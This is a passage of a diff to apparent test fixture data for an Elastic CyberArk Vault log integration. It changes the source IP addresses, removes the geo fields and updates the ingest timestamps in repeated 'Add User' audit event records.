\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830954Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -745,17 +639,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -775,7 +660,7 @@ "PSMPGW_SSH" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -783,8 +668,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:16Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPGW_SSH", "message": "Add User", @@ -798,8 +683,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586643200Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830959500Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -825,17 +710,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -855,7 +731,7 @@ "PSMPApp_SSH" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -863,8 +739,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:16Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPApp_SSH", "message": "Add User", @@ -878,8 +754,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586646900Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830964900Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -905,17 +781,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -935,7 +802,7 @@ "PSMP_ADB_asr-cyberark-psm-ssh" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -943,8 +810,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:21Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMP_ADB_asr-cyberark-psm-ssh", "message": "Add User", @@ -958,8 +825,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586650500Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830970700Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 